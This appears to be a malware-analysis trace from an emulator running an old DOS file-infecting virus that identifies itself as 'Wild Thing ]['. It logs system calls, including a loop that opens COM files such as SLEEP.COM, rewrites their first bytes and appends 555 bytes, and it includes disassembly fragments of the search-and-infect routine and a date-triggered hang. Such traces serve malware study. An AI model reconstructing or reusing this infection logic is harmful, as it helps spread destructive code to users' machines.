2018-12-25T12:44:55.513158153Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.514624328Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.517560645Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.518999354Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.520427103Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.523381256Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.524914215Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.526401446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.528721577Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.530351097Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.531980669Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.534594951Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.536176569Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:55.541007681Z 62 PC: 8f90e | Close file
2018-12-25T12:44:55.5441959Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:55.545694352Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:55.547212154Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:55.552557084Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:55.554049422Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:55.558737066Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:55.561461925Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:55.562970731Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:55.56478929Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:55.567385328Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:55.569033969Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:55.57091839Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:55.573054251Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:55.574792825Z 73 PC: 8efea | Release memory
2018-12-25T12:44:55.576306047Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:55.578858635Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:55.580571714Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:55.582277253Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:55.584763936Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:55.593847175Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:55.601548673Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:55.604184462Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:55.6058676Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:55.625028287Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:55.627121479Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:55.628876271Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:55.631384968Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:55.633732254Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:55.635060538Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:55.636465657Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:55.638549501Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:55.640250314Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:55.642812597Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:55.648703662Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:55.654041356Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:55.658513237Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:55.660072151Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:55.661030424Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:55.66233277Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:55.664609095Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:55.665317184Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:55.666856043Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.66846695Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.669872468Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:55.672173014Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:55.674657222Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:55.680820573Z 62 PC: 131ba | Close file
2018-12-25T12:44:55.683713885Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:55.684732229Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:55.685965467Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:55.687992303Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:55.689150744Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:55.690673603Z 73 PC: 119df | Release memory
2018-12-25T12:44:55.692274463Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:55.693958414Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:53.102158454Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:53.105056041Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:53.107451236Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:53.110135022Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:53.113270277Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:53.117483338Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:53.128430844Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:53.13948784Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:53.155056209Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:53.161629436Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:53.163552822Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:53.17044122Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:53.171935447Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:53.174511961Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.176613697Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:53.184561191Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:53.185756861Z 62 PC: 12f2e | Close file
2018-12-25T12:44:53.193295246Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:53.20329269Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.206227964Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.213459629Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.223661587Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.230055314Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.232155845Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.238477266Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.239808066Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.243455229Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.245145356Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.254415257Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.256175942Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.264241734Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.27435436Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.278765004Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.285064377Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.295008565Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.301773608Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.303449634Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.309831437Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.311143828Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.317876134Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.319518709Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.32784651Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.330366674Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.337885988Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.347866916Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.355420266Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.367227355Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.377073089Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.384305941Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.385744435Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.391988066Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.393702982Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.396113762Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.397552125Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.40608687Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.408270643Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.416283613Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.427194918Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.429637Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.435052601Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.445207327Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.451622974Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.453646128Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.460484887Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.461981721Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.464692528Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.466917026Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.476332085Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.478218Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.487618627Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.497631735Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.500529172Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.507311201Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.517987422Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.524875234Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.527401635Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.534310246Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.536427973Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.540012247Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.542248446Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.551568061Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.553477567Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.561130751Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.570531573Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.573209019Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.579065685Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.588457069Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.599477248Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.601966241Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.608835355Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.610358273Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.614077171Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.615766026Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.623911076Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.626196536Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.634035743Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.643987155Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.647353702Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.653017989Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.662744683Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.675418728Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.677526913Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.684076016Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.686520384Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.693798868Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.703841085Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.707013388Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:53.711290248Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:53.713244498Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:53.71546082Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:55.856805319Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:55.858750971Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:55.861190023Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:55.863395421Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:55.873636143Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:55.875437122Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:55.877878153Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:55.88954885Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:55.89079384Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:55.893692828Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:55.895774458Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:55.897663408Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:55.899554972Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:55.901942017Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.905989088Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.910767102Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:55.921440827Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:55.92323142Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:55.925473339Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:55.948131059Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:55.951805632Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:55.953740148Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.955015239Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.956205512Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.958283549Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.959770861Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:55.96758705Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:55.970179045Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:55.972167843Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.973944797Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.97628249Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.977734302Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.979392275Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.982028684Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.983712843Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.985376706Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.987573593Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.989044909Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.990395746Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.992904225Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.995330117Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.996991501Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.999441147Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.00114081Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.002842298Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.005294954Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.006985069Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.008613873Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.010866056Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.012467832Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.014105043Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.016425097Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.017813653Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.019243625Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.021662203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.023319045Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.024936872Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.026959489Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:56.03179906Z 62 PC: 8f90e | Close file
2018-12-25T12:44:56.03367652Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:56.03575915Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:56.037242267Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:56.041665611Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:56.043946992Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:56.048368701Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:56.049907346Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:56.052122726Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:56.053940215Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:56.055347209Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:56.057514189Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:56.059056217Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:56.060409312Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:56.062930037Z 73 PC: 8efea | Release memory
2018-12-25T12:44:56.064125162Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:56.065528027Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:56.067734271Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:56.069087837Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:56.070291302Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:56.080177646Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:56.085662452Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:56.086981708Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:56.089292524Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:56.109590028Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:56.110327666Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:56.112348611Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:56.114798009Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:56.116345159Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:56.118212425Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:56.119553127Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:56.123676924Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:56.125249276Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:56.127413244Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:56.13299538Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:56.139091205Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:56.14445775Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:56.147107753Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:56.148205997Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:56.149387671Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:56.152047125Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:56.152995262Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:56.154478561Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.15660388Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.157969941Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:56.160020881Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:56.162648449Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:56.168600912Z 62 PC: 131ba | Close file
2018-12-25T12:44:56.170482173Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:56.172711341Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:56.174072004Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:56.175551394Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:56.177601099Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:56.179108386Z 73 PC: 119df | Release memory
2018-12-25T12:44:56.180253053Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:56.182789881Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:53.128182015Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:53.132057536Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:53.134437033Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:53.137500414Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:53.140426477Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:53.146944392Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:53.153179304Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:53.159332872Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:53.177850086Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:53.185231948Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:53.186774655Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:53.19475725Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:53.196647585Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:53.199871246Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.203071949Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:53.212430305Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:53.213929137Z 62 PC: 12f2e | Close file
2018-12-25T12:44:53.224006943Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:53.235169102Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.238324131Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.245522062Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.256647737Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.269695975Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.271269524Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.279986024Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.281541717Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.284426287Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.287773767Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.296530629Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.2981362Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.3075419Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.487399771Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.490398542Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.498332902Z 67 PC: 12ec2 | Get or set file attributes (See above)
